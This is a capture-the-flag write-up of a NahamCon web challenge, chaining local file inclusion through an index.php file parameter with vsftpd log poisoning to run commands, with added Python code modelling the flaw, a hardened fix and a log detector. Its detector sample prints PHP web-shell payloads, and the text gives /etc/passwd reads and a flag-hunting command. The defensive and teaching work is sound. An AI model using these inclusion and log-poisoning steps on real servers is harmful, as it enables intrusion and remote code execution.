Tags: rce lfi log_poisoning
Rating:
The task gives us two links: the [website of a logging service](http://challenge.nahamcon.com:31042) and an [ftp_server](http://challenge.nahamcon.com:30199). We can guess that the second one is an FTP server from the line "FTP can be used to access raw files if needed" in the logging service description, or simply by connecting with netcat and reading the banner:
```
~ nc challenge.nahamcon.com 30199
220 Welcome to FTP Server
```
Unfortunately we can't get into the FTP server, because we don't know a valid username and password:
```
~ ftp challenge.nahamcon.com 30199
Connected to challenge.nahamcon.com.
220 Welcome to FTP Server
Name (challenge.nahamcon.com:dizvyagintsev): idontknowusername
331 Please specify the password.
Password: idontknowpassword
530 Login incorrect.
ftp: Login failed.
```
Let's examine the site a bit more. The "Learn more about our pricing" button sends us to http://challenge.nahamcon.com:31042/index.php?file=pricing. The page to display is passed as a filename in a GET parameter, so we can try local file inclusion:
![LFI](https://i.ibb.co/3N4bKKq/2021-03-16-14-07-57.png)
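To make the bug concrete, here is an added Python model of the `index.php?file=` handler (the application itself is PHP; this is the editor's illustration, not the challenge's source): a resolver that uses the parameter as-is, next to a hardened one that only accepts a bare page name and checks that the result stays inside the page directory. The page directory, the `.php` suffix and the probe inputs are assumptions.

```python
import os
import re

# Assumed layout (not stated on the page): Apache's home is /var/www per
# /etc/passwd, so we model the site's page files as living under it.
WEB_ROOT = "/var/www"
PAGE_DIR = os.path.normpath(os.path.join(WEB_ROOT, "pages"))

# Inputs we throw at both resolvers: the legitimate page, a traversal,
# an absolute path and the log that gets poisoned later in the writeup.
PROBES = ["pricing", "../../../etc/passwd", "/etc/passwd", "/var/log/vsftpd.log"]

# Bare page names only: no '/', no '.', bounded length.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def vulnerable_resolve(file_param):
    """Models what index.php?file=... behaves like: the parameter becomes
    the path that gets included, with no check at all. Traversal and
    absolute paths go straight through, which is the LFI being exploited."""
    return os.path.normpath(os.path.join(PAGE_DIR, file_param))


def hardened_resolve(file_param):
    """Fix: accept only a bare page name, map it to a fixed directory and
    extension, and confirm the result is still inside PAGE_DIR.
    Both checks matter: the regex rejects '/' and '..' outright, and the
    containment check survives any later loosening of the regex
    (for example to allow subdirectories). Returns None on rejection."""
    if not SAFE_NAME.fullmatch(file_param):
        return None
    candidate = os.path.normpath(os.path.join(PAGE_DIR, file_param + ".php"))
    if os.path.commonpath([candidate, PAGE_DIR]) != PAGE_DIR:
        return None
    return candidate


def compare(probes=PROBES):
    """Run every probe through both resolvers: (vulnerable, hardened)."""
    return {p: (vulnerable_resolve(p), hardened_resolve(p)) for p in probes}


if __name__ == "__main__":
    for probe, (vuln, safe) in compare().items():
        print(f"{probe!r:24} vulnerable -> {vuln!r:24} hardened -> {safe!r}")
```

The PHP equivalent of the hardened resolver is a whitelist match on `$_GET['file']` followed by `realpath()` and a prefix comparison against the page directory before `include`.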
But we don't know which file the flag is in, so we need a way to execute code on the server. I tried some ways from this [cheat sheet](https://highon.coffee/blog/lfi-cheat-sheet/), but nothing worked.
From /etc/passwd we can find out that the logging service uses Apache as its web server and vsftpd as its FTP server:
```
apache:x:100:101:apache:/var/www:/sbin/nologin
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
```
We control part of what gets written into their logs, so if we can include the Apache or vsftpd log through the `file` parameter we can inject PHP code into the page and get remote code execution. This only works for a log the web server user is allowed to read: we can't open the Apache log `/var/log/apache2/access.log`, but `/var/log/vsftpd.log` works:
![vsftpd logs](https://i.ibb.co/NSXmbxn/2021-03-16-14-39-21.png)
We can see that vsftpd logs the username of every login attempt, even a failed one. So if we log in with a username that is valid PHP code which hands the `cmd` GET parameter to a shell, including the log will execute whatever we put in `cmd`:
```
~ ftp challenge.nahamcon.com 30199
Connected to challenge.nahamcon.com.
220 Welcome to FTP Server
Name (challenge.nahamcon.com:dizvyagintsev):
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed.
```
Let's use `find / -name 'flag.txt' | xargs cat` as the command: it recursively searches for flag.txt starting from the root directory and cats its content. The command has to be URL-encoded when it goes into the `cmd` parameter (spaces, quotes and the pipe are not safe in a query string), and its output appears inside the included log, in place of the poisoned username.
![flag](https://i.ibb.co/CmTrwLn/2021-03-16-14-56-49.png)
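Looking at the same log from the defender's side, as an added example that is not part of the writeup: a small detector over vsftpd log lines that flags login attempts whose username contains a PHP tag, which is the artefact this technique necessarily leaves behind. The log lines are constructed to match vsftpd's default format; the usernames in them are not the page's own.

```python
import re
from collections import Counter

# Constructed sample in vsftpd's default log format (not the page's own log).
# The third and fifth entries are the kind of lines log poisoning leaves.
SAMPLE_LOG = """\
Tue Mar 16 14:30:01 2021 [pid 12] CONNECT: Client "::ffff:10.0.0.5"
Tue Mar 16 14:30:02 2021 [pid 11] [idontknowusername] FAIL LOGIN: Client "::ffff:10.0.0.5"
Tue Mar 16 14:39:10 2021 [pid 14] [<?php system($_GET['cmd']); ?>] FAIL LOGIN: Client "::ffff:10.0.0.5"
Tue Mar 16 14:40:00 2021 [pid 16] [alice] OK LOGIN: Client "::ffff:10.0.0.7"
Tue Mar 16 14:41:13 2021 [pid 18] [<?=`$_GET[0]`?>] FAIL LOGIN: Client "::ffff:10.0.0.9"
"""

# timestamp, [pid N], optional [username], rest of message.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] "
    r"(?:\[(?P<user>.*?)\] )?(?P<msg>.*)$"
)
CLIENT_RE = re.compile(r'Client "([^"]+)"')
# PHP open tags (<?php, <?=, short <?) and the legacy <script language="php"> form.
PHP_TAG_RE = re.compile(r"<\?|<script", re.IGNORECASE)


def parse_line(line):
    """Split one vsftpd log line into fields; user is None for lines
    without a login attempt (e.g. CONNECT)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client = CLIENT_RE.search(m["msg"])
    return {"ts": m["ts"], "user": m["user"], "msg": m["msg"],
            "client": client.group(1) if client else None}


def scan_vsftpd_log(lines):
    """Flag login attempts whose username carries a PHP tag. The username is
    attacker-controlled text in a file the web server may be able to read,
    so a tag here is a poisoning attempt whether or not the login succeeded."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["user"] and PHP_TAG_RE.search(rec["user"]):
            findings.append(rec)
    return findings


def attempts_per_client(findings):
    """Count poisoning attempts by source address for alert aggregation."""
    return Counter(f["client"] for f in findings)


if __name__ == "__main__":
    hits = scan_vsftpd_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["ts"]}  {h["client"]}  user={h["user"]!r}')
    print(attempts_per_client(hits))
```

The detection is a stopgap; the two fixes that remove the bug class are the web application refusing to include attacker-chosen paths, and the vsftpd log not being readable by the web server user.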